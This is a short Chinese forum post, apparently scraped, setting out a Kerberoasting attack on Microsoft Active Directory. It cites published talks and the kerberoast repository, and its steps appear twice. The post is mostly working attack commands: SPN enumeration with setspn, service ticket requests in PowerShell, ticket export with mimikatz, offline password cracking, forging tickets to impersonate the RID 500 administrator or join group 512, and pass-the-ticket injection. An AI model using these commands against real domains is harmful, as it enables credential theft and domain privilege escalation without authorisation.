参考:
1. [url]http://securityweekly.com/2014/09/26/derbycon-attacking-kerberos-talk-ill-be-checking-out-and-you-should-too/[/url]
2. [url]https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf[/url]
3. [url]https://github.com/nidem/kerberoast[/url]
方法:
1. 查找服务账户
2. 识别user账户,忽略机器账户,通常机器账户密码不太容易破解
3. 获得ticket
原型是:
4. 使用Mimikatz从RAM中获得tickets
5. 离线破解服务口令
6. 将user伪装成另一个user
或者把user加入一个组(本例为admin组)
7. 使用Mimikatz注入内存
1. [url]http://securityweekly.com/2014/09/26/derbycon-attacking-kerberos-talk-ill-be-checking-out-and-you-should-too/[/url]
2. [url]https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf[/url]
3. [url]https://github.com/nidem/kerberoast[/url]
方法:
1. 查找服务账户
setspn -T DOMAINNAME -F -Q */*2. 识别user账户,忽略机器账户,通常机器账户密码不太容易破解
3. 获得ticket
PS C:\> Add-Type -AssemblyName System.IdentityModel
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"原型是:
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -Arguemtlist “HTTP / YOURKERB SERVER”4. 使用Mimikatz从RAM中获得tickets
mimikatz# kerberos::list /export5. 离线破解服务口令
tgsrepcrack.py -w wordlist.txt *.kirbi6. 将user伪装成另一个user
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500或者把user加入一个组(本例为admin组)
./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 5127. 使用Mimikatz注入内存
kerberos::ptt sql.kirbi
扫一扫
1049
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
